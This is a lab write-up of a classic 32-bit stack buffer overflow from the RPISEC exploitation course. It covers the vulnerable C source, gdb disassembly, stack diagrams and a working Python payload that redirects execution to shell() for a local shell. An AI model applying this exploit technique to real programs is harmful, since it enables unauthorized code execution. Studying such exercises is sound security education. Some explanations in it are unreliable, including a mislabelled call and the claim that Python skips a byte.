Buffer Overflow Exercise

Challenge: Exploit vulnerability in source code, and obtain a shell (in-depth solution included) This was taken from RPIs Modern Binary Exploitation Course (https://github.com/RPISEC/MBE/). Source Code
#include <stdlib.h> #include <stdio.h> #include <string.h> /* compiled with: * for 32bit: gcc -fno-stack-protector code.c * for 64bit: gcc -fno-stack-protector -m32 code.c */ char* exec_string = "/bin/sh"; void shell(char* cmd){ system(cmd); } void print_name(char* input){ char buf[15]; strcpy(buf, input); printf("Hello %s\n", buf); } int main(int argc, char** argv){ if(argc != 2) { printf("usage:\n%s string\n", argv[0]); return EXIT_FAILURE; } print_name(argv[1]); return EXIT_SUCCESS; }


by Moses Ike (ISC2 Associate towards CISSP)
Use a 32bit machine or 64bit machine (compiled with -m32 option) Tools needed: GDB Ok, lets look at the source code, and make some hacker observations 1. A vulnerable c function strcpy(), sweet ! 2. An opportunity to receive input from user (aka me the attacker !) 3. A global variable -"/bin/sh" , already in memory for us 4. An uncalled function, shell(), we sure need to know where that is in memory Now lets set our objectives or what I call 'rules of engagement' 1. we are particularly interested in the function print_name(), duh!, thats where the overflow would take place 2. We will overflow array buf[], and make the function print_name() return to where function shell() starts off 3. Among our overflow juice, is an address of exec_string that contains our command "/bin/sh". We have to carefully position it in such a way as to make it accessible by the system call, "system" in function shell() 4. Once we achieve the above, we have our shell Ok, lets get down to business, following our rule of engagement step by step 1. VISUALIZING THE STACK Take a look at the print_name function, and visualize the stack. pay particular attention to the address of buf[], i.e how far it is from print_name's $ebp using gdb to disasemble print_name() compile code: gcc -fno-stack-protector -ggdb -m32 code.c run gdb: gdb a.out
gdb a.out GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1 Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from a.out...done. disas print_name (gdb) disas print_name Dump of assembler code for function print_name: 0x08048490 <+0>: push %ebp 0x08048491 <+1>: mov %esp,%ebp 0x08048493 <+3>: sub $0x28,%esp 0x08048496 <+6>: mov 0x8(%ebp),%eax 0x08048499 <+9>: mov %eax,0x4(%esp) 0x0804849d <+13>: lea -0x17(%ebp),%eax 0x080484a0 <+16>: mov %eax,(%esp) 0x080484a3 <+19>: call 0x8048340 0x080484a8 <+24>: lea -0x17(%ebp),%eax 0x080484ab <+27>: mov %eax,0x4(%esp) 0x080484af <+31>: movl $0x8048578,(%esp) 0x080484b6 <+38>: call 0x8048330 0x080484bb <+43>: leave 0x080484bc <+44>: ret End of assembler dump. (gdb)
Note these assembly snippet EXPLANATION 0x08048496 <+6>: mov 0x8(%ebp),%eax retrives the argument: (char* input or argv) 0x08048499 <+9>: mov %eax,0x4(%esp) adjusts for argv[1], i.e argv[0] + 4 0x0804849d <+13>: lea -0x17(%ebp),%eax address (0x17 from $epb) assigned/allocated for buf[] 0x080484a0 <+16>: mov %eax,(%esp) pushes the argv[1] address unto the stack, i.e for strcpy 0x080484a3 <+19>: call 0x8048340 <system@plt> calls strcpy One important thing to note is 0x17, or 23 bytes (**we need this number), which is the distance from buf[0] to the $epb.
print_name STACK LAYOUT |_______________________________| | A | |_______________________________| | B | |_______________________________| | | | ret address: from main | |_______________________________| | | | $epb: saved by print_name | |_______________________________| ______ ebp for print_print | | | | | | |_______________________________| | | | | | | | |_______________________________| | 23 bytes from $ebp where buf[0] starts off . | . | . | | | | | |____buf[0] : starts here_______ ____ __ | | | | |_______________________________| | | | | |_______________________________|
Ok, lets re-state our "over-flow and exploit" goal, given the above diagram. 1. overwrite function print_name() "return address" to where function shell() starts off 2. overwrite saved $epb with some address within the programs stack space 3. but where would we write the exec_string "\bin\sh" so that function shell() can retireve it as an argument ? Well, arguments are usually located 8 bytes (above) from a functions $epb (pushed onto the stack by the calling function). Ok, lets confirm
(gdb) disas shell Dump of assembler code for function shell: 0x0804847d <+0>: push %ebp 0x0804847e <+1>: mov %esp,%ebp 0x08048480 <+3>: sub $0x18,%esp 0x08048483 <+6>: mov 0x8(%ebp),%eax 0x08048486 <+9>: mov %eax,(%esp) 0x08048489 <+12>: call 0x8048350 0x0804848e <+17>: leave 0x0804848f <+18>: ret End of assembler dump. (gdb)
Yeah buddy, thats what I thought. EXPLANATION 0x08048483 <+6>: mov 0x8(%ebp),%eax shell() retrieved the argument char* cmd (aka "/bin/sh") from $epb + 8 0x08048486 <+9>: mov %eax,(%esp) 0x08048489 <+12>: call 0x8048350 <system@plt> We also see that function shell() starts off at 0x0804847d (**we need this address) GOAL 2: Ok lets find a close address within the print_name stack space Lets try and get print_name's $epb, which is the print_name's $esp, at the first time print_name is called
(gdb) break print_name (gdb) display $esp 1: $esp = (void *) 0xffffd000
So we see its : 0xffffd000 (** we need this address) GOAL 3: Ok, lets get the address of the string exec_string, which is "\bin\sh"
(gdb) print exec_string $1 = 0x8048570 "/bin/sh" (gdb)
(gdb) display/x exec_string 1: /x exec_string = 0x8048570 (gdb)
So we see it is : 0x8048570 (0r 0x08048570) (** we need this) FINALIZING THE GOALS : We saw before that function shell() grabs its argument from an address 4 bytes above $ebp The $ebp within that execution context, is the $ebp after print_name exits. Thats the $ebp that print_name saves, which it will pop into $ebp register when it executes the instruction LEAVE. But we will control the value of that $ebp by overwriting it In summary (with the above stack in mind), lets overflow the juice ! 1. fill buf[] with arbitrary 23 bytes, then continue, fill with 2. 0xffffd000 - the address with want the $ebp to be after print_name exits *Notice that this is the same address on the stack where main's $ebp was actually saved by print_name. Continue fill with 3. 0x0804847d - the address where function shell() starts off continue, fill with 8 bytes 4. 0x08048570 - the address of string exec_string, i.e "\bin\sh" If you understand, skip to INPUTTING/CONSTRUCTING THE PAYLOAD ARGUEMENT MORE EXPLANATION recall this already drawn stack
|_______________________________| ____ | A | | |_______________________________| these 8bytes will be | B | filled with 0x08048570 (the address to "\bin\sh"), but why? |_______________________________|_____| | | | ret address: from main | C |_______________________________| | | | $epb: saved by print_name | D |_______________________________|
Remember, during print_name exiting, it pops "return address" from the stack, and returns control to the caller function, which we have managed to make it the function shell() function at iniation will see its top of stack at memory location B Recall the first 2 intruction shell() executes
(gdb) disas shell Dump of assembler code for function shell: 0x0804847d <+0>: push %ebp This moves top of stack to memory location C 0x0804847e <+1>: mov %esp,%ebp This makes $ebp, the memory location C 0x08048480 <+3>: sub $0x18,%esp 0x08048483 <+6>: mov 0x8(%ebp),%eax . .
Hence fetching, the passed argument from 0x8(%ebp), means fetching from memory A (thats why will filled with A, B with address of "\bin\sh") INPUTTING/CONSTRUCTING THE PAYLOAD ARGUEMENT so combining all arguments needed (in hex), we get
'\xAA'*23 -- 23 bytes of arbitrary bytes -- overflow juice '\x00\xd0\xff\xff' -- 0xffffd000 in little endian -- the address with want the $ebp to be after print_name exits '\x7d\x84\x04\x08' -- 0x0804847d in little endian -- the address where function shell() starts off '\x70\x85\x04\x08'*2 -- 0x08048570 in little endian -- address of string exec_string, i.e "\bin\sh"
Because these character strings are escaped characters (hex), we can just enter them manually via command line. we need a tool which can feed it as an argument to the c binary so I chose python, and the command is as follows
python -c "print '\xAA'*23 + '\x00\xd0\xff\xff' + '\x7d\x84\x04\x08' + '\x70\x85\x04\x08'*2"
to feed it to the c binary a.out, you do
./a.out $(python -c "print '\xAA'*24 + '\x00\xd0\xff\xff' + '\x7d\x84\x04\x08' + '\x70\x85\x04\x08'*2") Hello ���������������������������}�p�p� $ $
GOT A SHELL !! Wondering the reason why its '\xAA'*24 instead of '\xAA'*23 Thats because for some reason, python skips the first byte of escape characters